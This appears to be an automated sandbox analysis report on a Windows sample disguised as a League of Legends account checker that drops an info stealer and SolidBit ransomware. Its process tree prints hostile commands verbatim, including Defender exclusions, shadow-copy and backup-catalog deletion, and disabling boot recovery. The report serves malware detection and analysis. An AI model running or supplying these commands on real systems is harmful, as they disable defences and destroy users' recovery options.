Analysis
-
max time kernel
143s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
08-03-2023 01:43
Static task
static1
Behavioral task
behavioral1
Sample
4bc5ade40ab56113ce9709c0da15416628e089e838864a6756ceca90b8ffaf5b.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
4bc5ade40ab56113ce9709c0da15416628e089e838864a6756ceca90b8ffaf5b.exe
Resource
win10v2004-20230220-en
General
-
Target
4bc5ade40ab56113ce9709c0da15416628e089e838864a6756ceca90b8ffaf5b.exe
-
Size
5.6MB
-
MD5
bded213b6ad8b501a9a8769498c06858
-
SHA1
3927ded7ffee7ab8f400d00bcb3b5479ffa3abfb
-
SHA256
4bc5ade40ab56113ce9709c0da15416628e089e838864a6756ceca90b8ffaf5b
-
SHA512
01fae25d7d0865ea0bd3b2f4d8f51d192a3ae9b7af5ab23ea55b34cadc3618ad66f53aec865776a50c98a7fb8076e71335d180ebf6e8ad02cf4a74799d780ee3
-
SSDEEP
98304:QxD6iw63xsDaup/EMGVxpE581oyzEY6JvRdZjYZPqXEla15YYO:QR6b6+HE25ZyzEX9jaqzv2
Malware Config
Extracted
C:\Users\Admin\3D Objects\RESTORE-MY-FILES.txt
http://solidb2jco63vbhx4sfimnqmwhtdjk4jbbgq7a24cmzzkfse4rduxgid.onion
Signatures
-
Luca Stealer
Info stealer written in Rust first seen in July 2022.
-
Luca Stealer payload 2 IoCs
resource yara_rule behavioral2/files/0x0006000000022fa0-6679.dat family_lucastealer behavioral2/files/0x0006000000022fa0-6680.dat family_lucastealer -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 3864 bcdedit.exe 4828 bcdedit.exe -
pid Process 1112 wbadmin.exe -
Modifies extensions of user files 8 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\UseOut.raw.solidbit Runtime64.exe File created C:\Users\Admin\Pictures\WatchResize.png.solidbit Runtime64.exe File opened for modification C:\Users\Admin\Pictures\WatchResize.png.solidbit Runtime64.exe File created C:\Users\Admin\Pictures\RenameSend.tif.solidbit Runtime64.exe File opened for modification C:\Users\Admin\Pictures\RenameSend.tif.solidbit Runtime64.exe File created C:\Users\Admin\Pictures\UnregisterSplit.tif.solidbit Runtime64.exe File opened for modification C:\Users\Admin\Pictures\UnregisterSplit.tif.solidbit Runtime64.exe File created C:\Users\Admin\Pictures\UseOut.raw.solidbit Runtime64.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation Runtime64.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini Runtime64.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RESTORE-MY-FILES.txt Runtime64.exe -
Executes dropped EXE 3 IoCs
pid Process 928 LoL Checker x64.exe 1860 LoL Account Checker.exe 5048 Runtime64.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UpdateTask = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Runtime64.exe" Runtime64.exe -
Drops desktop.ini file(s) 64 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini Runtime64.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini Runtime64.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini Runtime64.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini Runtime64.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini Runtime64.exe File opened for modification C:\Users\Public\Libraries\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini Runtime64.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini Runtime64.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini Runtime64.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\Music\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini Runtime64.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini Runtime64.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini Runtime64.exe File opened for modification C:\Users\Public\Music\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini Runtime64.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini Runtime64.exe File opened for modification C:\Users\Public\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\Videos\desktop.ini Runtime64.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini Runtime64.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini Runtime64.exe File opened for modification C:\Users\Public\Pictures\desktop.ini Runtime64.exe File opened for modification C:\Users\Public\Videos\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\Links\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini Runtime64.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini Runtime64.exe File opened for modification C:\Users\Public\Documents\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\Searches\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini Runtime64.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini Runtime64.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini Runtime64.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Runtime64.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini Runtime64.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini Runtime64.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini Runtime64.exe File opened for modification C:\Users\Public\Desktop\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini Runtime64.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini Runtime64.exe File opened for modification C:\Users\Public\Downloads\desktop.ini Runtime64.exe File opened for modification C:\Users\Admin\Documents\desktop.ini Runtime64.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 27 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2104 4bc5ade40ab56113ce9709c0da15416628e089e838864a6756ceca90b8ffaf5b.exe 2104 4bc5ade40ab56113ce9709c0da15416628e089e838864a6756ceca90b8ffaf5b.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS 4bc5ade40ab56113ce9709c0da15416628e089e838864a6756ceca90b8ffaf5b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer 4bc5ade40ab56113ce9709c0da15416628e089e838864a6756ceca90b8ffaf5b.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2304 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 1860 LoL Account Checker.exe 1860 LoL Account Checker.exe 1724 powershell.exe 1208 powershell.exe 1208 powershell.exe 1208 powershell.exe 1724 powershell.exe 1724 powershell.exe 1860 LoL Account Checker.exe 1860 LoL Account Checker.exe 1860 LoL Account Checker.exe 1860 LoL Account Checker.exe 4200 powershell.exe 4200 powershell.exe 4604 powershell.exe 4604 powershell.exe 4236 powershell.exe 4236 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 1724 powershell.exe Token: SeDebugPrivilege 1208 powershell.exe Token: SeDebugPrivilege 4200 powershell.exe Token: SeDebugPrivilege 4604 powershell.exe Token: SeDebugPrivilege 4236 powershell.exe Token: SeBackupPrivilege 2360 vssvc.exe Token: SeRestorePrivilege 2360 vssvc.exe Token: SeAuditPrivilege 2360 vssvc.exe -
Suspicious use of WriteProcessMemory 44 IoCs
description pid Process procid_target PID 2104 wrote to memory of 628 2104 4bc5ade40ab56113ce9709c0da15416628e089e838864a6756ceca90b8ffaf5b.exe 87 PID 2104 wrote to memory of 628 2104 4bc5ade40ab56113ce9709c0da15416628e089e838864a6756ceca90b8ffaf5b.exe 87 PID 2104 wrote to memory of 628 2104 4bc5ade40ab56113ce9709c0da15416628e089e838864a6756ceca90b8ffaf5b.exe 87 PID 2104 wrote to memory of 3936 2104 4bc5ade40ab56113ce9709c0da15416628e089e838864a6756ceca90b8ffaf5b.exe 88 PID 2104 wrote to memory of 3936 2104 4bc5ade40ab56113ce9709c0da15416628e089e838864a6756ceca90b8ffaf5b.exe 88 PID 2104 wrote to memory of 3936 2104 4bc5ade40ab56113ce9709c0da15416628e089e838864a6756ceca90b8ffaf5b.exe 88 PID 2104 wrote to memory of 2720 2104 4bc5ade40ab56113ce9709c0da15416628e089e838864a6756ceca90b8ffaf5b.exe 91 PID 2104 wrote to memory of 2720 2104 4bc5ade40ab56113ce9709c0da15416628e089e838864a6756ceca90b8ffaf5b.exe 91 PID 2104 wrote to memory of 2720 2104 4bc5ade40ab56113ce9709c0da15416628e089e838864a6756ceca90b8ffaf5b.exe 91 PID 2104 wrote to memory of 1488 2104 4bc5ade40ab56113ce9709c0da15416628e089e838864a6756ceca90b8ffaf5b.exe 93 PID 2104 wrote to memory of 1488 2104 4bc5ade40ab56113ce9709c0da15416628e089e838864a6756ceca90b8ffaf5b.exe 93 PID 2104 wrote to memory of 1488 2104 4bc5ade40ab56113ce9709c0da15416628e089e838864a6756ceca90b8ffaf5b.exe 93 PID 2720 wrote to memory of 928 2720 cmd.exe 95 PID 2720 wrote to memory of 928 2720 cmd.exe 95 PID 2720 wrote to memory of 928 2720 cmd.exe 95 PID 3936 wrote to memory of 1208 3936 cmd.exe 97 PID 3936 wrote to memory of 1208 3936 cmd.exe 97 PID 3936 wrote to memory of 1208 3936 cmd.exe 97 PID 628 wrote to memory of 1724 628 cmd.exe 96 PID 628 wrote to memory of 1724 628 cmd.exe 96 PID 628 wrote to memory of 1724 628 cmd.exe 96 PID 1488 wrote to memory of 1860 1488 cmd.exe 98 PID 1488 wrote to memory of 1860 1488 cmd.exe 98 PID 3936 wrote to memory of 4200 3936 cmd.exe 105 PID 3936 wrote to memory of 4200 3936 cmd.exe 105 PID 3936 wrote to memory of 4200 3936 cmd.exe 105 PID 928 wrote to memory of 892 928 LoL Checker x64.exe 115 PID 928 wrote to memory of 892 928 LoL Checker x64.exe 115 PID 928 wrote to memory of 892 928 LoL Checker x64.exe 115 PID 928 wrote to memory of 208 928 LoL Checker x64.exe 117 PID 928 wrote to memory of 208 928 LoL Checker x64.exe 117 PID 928 wrote to memory of 208 928 LoL Checker x64.exe 117 PID 892 wrote to memory of 4604 892 cmd.exe 119 PID 892 wrote to memory of 4604 892 cmd.exe 119 PID 892 wrote to memory of 4604 892 cmd.exe 119 PID 208 wrote to memory of 5048 208 cmd.exe 120 PID 208 wrote to memory of 5048 208 cmd.exe 120 PID 892 wrote to memory of 4236 892 cmd.exe 122 PID 892 wrote to memory of 4236 892 cmd.exe 122 PID 892 wrote to memory of 4236 892 cmd.exe 122 PID 5048 wrote to memory of 4424 5048 Runtime64.exe 123 PID 5048 wrote to memory of 4424 5048 Runtime64.exe 123 PID 4424 wrote to memory of 2304 4424 cmd.exe 125 PID 4424 wrote to memory of 2304 4424 cmd.exe 125 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\4bc5ade40ab56113ce9709c0da15416628e089e838864a6756ceca90b8ffaf5b.exe"C:\Users\Admin\AppData\Local\Temp\4bc5ade40ab56113ce9709c0da15416628e089e838864a6756ceca90b8ffaf5b.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\SysWOW64\cmd.execmd /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Loading Rust Components. It can take up to 5 minutes, please wait.','Error','OK','Error')"2⤵
- Suspicious use of WriteProcessMemory
PID:628 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Loading Rust Components. It can take up to 5 minutes, please wait.','Error','OK','Error')"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:3936 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1208
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4200
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c start "" "C:\Users\Admin\AppData\Local\Temp\LoL Checker x64.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Users\Admin\AppData\Local\Temp\LoL Checker x64.exe"C:\Users\Admin\AppData\Local\Temp\LoL Checker x64.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:928 -
C:\Windows\SysWOW64\cmd.execmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit4⤵
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4604
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c start "" "C:\Users\Admin\AppData\Local\Temp\Runtime64.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Users\Admin\AppData\Local\Temp\Runtime64.exe"C:\Users\Admin\AppData\Local\Temp\Runtime64.exe"5⤵
- Modifies extensions of user files
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Suspicious use of WriteProcessMemory
PID:5048 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete6⤵
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet7⤵
- Interacts with shadow copies
PID:2304
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete7⤵PID:3892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no6⤵PID:2420
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures7⤵
- Modifies boot configuration data using bcdedit
PID:3864
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no7⤵
- Modifies boot configuration data using bcdedit
PID:4828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet6⤵PID:680
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet7⤵
- Deletes backup catalog
PID:1112
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c start "" "C:\Users\Admin\AppData\Local\Temp\LoL Account Checker.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Users\Admin\AppData\Local\Temp\LoL Account Checker.exe"C:\Users\Admin\AppData\Local\Temp\LoL Account Checker.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1860
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2360
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵PID:3056
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:5036
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:1684
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
727B
MD5b772c9fd7ea993e0fc264fad8a817a0f
SHA1684222a5df722e50fcd38eac319e6d2f18bea20a
SHA2569aa4a2574e764938ea6b2a422d579718e9035aa81f5c3798fa7c7f63fef7c097
SHA51285c5a03bb8d5a65304670cefdee0258868af7b4e7b65808abe04423867a680e2b38d2befefee92407142e55e6e3ae26c51c3f62d0422d503acdd18073b28b88b
-
Filesize
1KB
MD54cc9e7069534f7bcbb90ad7cac69ed78
SHA1a3522b9edd4a7d28ad0ac0e1b659a82b6dc10892
SHA2564814be12fd2320cd9249d3b2611ea1421cb88823097fcbf0ca697e6e9ac93c9c
SHA512e408e0abb3b7166578c075d10f1378d6a6b39dc386361a4df23abc026e9a634bfb16c01daf9b8fcbe8555e335d93c8c9d8442a11c187df616f2d6cdd3ab53653
-
Filesize
18KB
MD5d350ad306e3d53c13c73713d34b8a59b
SHA19758d3282093e2e34505cb5546ad8a129bbdc2be
SHA256ba13d5e3765664e067410fbd2aa56e2febf85045c273e06dee8ecd2f673efaff
SHA512a8b096fd8e08e5ed32133088a08c4f6c47bd1af00ba1a39081fdcf422d79b57f57c9c971e210ae5d470c2699e12cd2decc069f215ae05b837b51c82756f6bd58
-
Filesize
18KB
MD5d350ad306e3d53c13c73713d34b8a59b
SHA19758d3282093e2e34505cb5546ad8a129bbdc2be
SHA256ba13d5e3765664e067410fbd2aa56e2febf85045c273e06dee8ecd2f673efaff
SHA512a8b096fd8e08e5ed32133088a08c4f6c47bd1af00ba1a39081fdcf422d79b57f57c9c971e210ae5d470c2699e12cd2decc069f215ae05b837b51c82756f6bd58
-
Filesize
18KB
MD587f8360ec7867115130e97a7d19ff049
SHA1cc796a6ae8ad106804c0687d5ec148f55f6cf9b2
SHA2565e7d975fcef192fb74806e5c1a75381148998f0adc23b156f10535425180e50a
SHA5126f56173d67932dae8a04f035801f84c396f9d54a51bcff0f37e2e914adf4b260c5e94de6181415c64535a1324530dd5248c22fab6b5ebf36fe8369c2aa52760d
-
Filesize
18KB
MD5e7aaf374b661e540f19b374e7499df16
SHA1ef126c5e7d8ebbf317a7a6e3cb73260614b1b7e4
SHA2563f840f3513e838188b61e97a825272ccb4d49a9a99b1f07cf1882d08eae84868
SHA512d300213af738cdd82b195713d1a3f7f9f67741c5fe580615e20e67f480d4d147d9885202d1952ff690200777e6b4b3898aa07bc5ca391cc70742c00f687a35b0
-
Filesize
4.2MB
MD5737d5f15ce6f25fd35748317f418228e
SHA1ce770614c55fd78247e81073739a65a4859af95a
SHA25605e13b81086568e323aa2a00d3c63f8df46f679a1d22a7a35062384f51342820
SHA5124913be2a1797ffc4b6be68a95bde091897a31490aec701580bf9978f5a76b3bc3d69655e500dac97ff5776d1325c97fe0ceae66982b84179f05ffd30ff4c3c9e
-
Filesize
4.2MB
MD5737d5f15ce6f25fd35748317f418228e
SHA1ce770614c55fd78247e81073739a65a4859af95a
SHA25605e13b81086568e323aa2a00d3c63f8df46f679a1d22a7a35062384f51342820
SHA5124913be2a1797ffc4b6be68a95bde091897a31490aec701580bf9978f5a76b3bc3d69655e500dac97ff5776d1325c97fe0ceae66982b84179f05ffd30ff4c3c9e
-
Filesize
257KB
MD5872be464e8b07144dd04ead953d26fec
SHA16908505f45adf61875f78e4e3e374da2d380b3b8
SHA25642105689f3974b93b06d56c81d4a6852e0ab7759eaa63834941be7ad4290ff60
SHA512a9b082aea81a7801f77588ba8834b71ddbd64f43169e9f381f8f43145470e3ed5442551e2483e2c88b7a596d5ccf9cfeb3f5d900ce2c4baa2a6742baa924f5a4
-
Filesize
257KB
MD5872be464e8b07144dd04ead953d26fec
SHA16908505f45adf61875f78e4e3e374da2d380b3b8
SHA25642105689f3974b93b06d56c81d4a6852e0ab7759eaa63834941be7ad4290ff60
SHA512a9b082aea81a7801f77588ba8834b71ddbd64f43169e9f381f8f43145470e3ed5442551e2483e2c88b7a596d5ccf9cfeb3f5d900ce2c4baa2a6742baa924f5a4
-
Filesize
252KB
MD53c9bd0d16cea39a29132136d93c0b2ec
SHA15ffdf5cb39cc0e51753843e9e0aa14a201472fe4
SHA256f96e95622e7ef19947169f534f792b660cf9ba8209a3b5de0ff7a22e2d5b1e86
SHA512314cccc5f00952d19819363342a149fae3ca73db1bff31253a267142537890ea6fab7461c25ff5d0bf530631beac477905ee93a06ef3fafd98ee398bf3aa9fd4
-
Filesize
252KB
MD53c9bd0d16cea39a29132136d93c0b2ec
SHA15ffdf5cb39cc0e51753843e9e0aa14a201472fe4
SHA256f96e95622e7ef19947169f534f792b660cf9ba8209a3b5de0ff7a22e2d5b1e86
SHA512314cccc5f00952d19819363342a149fae3ca73db1bff31253a267142537890ea6fab7461c25ff5d0bf530631beac477905ee93a06ef3fafd98ee398bf3aa9fd4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
214KB
MD54b8c1527092fcdb4b3743ba7234e41be
SHA1fddeb8c06741145b2ca7dfd0267855fdf1e7db56
SHA2562e37da2244ce77f4c0d78e372e81533a43ce58d379e1ac5346d09b332935790a
SHA51253f37fa3d9b25e9372397b1f402342ad3fafc27af5d9bb33c141bbec6832499cac48cfb20b4c93d59dd14b896e0049e14309301885af91da9815f032022d4856
-
Filesize
1B
MD5d1457b72c3fb323a2671125aef3eab5d
SHA15bab61eb53176449e25c2c82f172b82cb13ffb9d
SHA2568a8de823d5ed3e12746a62ef169bcf372be0ca44f0a1236abc35df05d96928e1
SHA512ca63c07ad35d8c9fb0c92d6146759b122d4ec5d3f67ebe2f30ddb69f9e6c9fd3bf31a5e408b08f1d4d9cd68120cced9e57f010bef3cde97653fed5470da7d1a0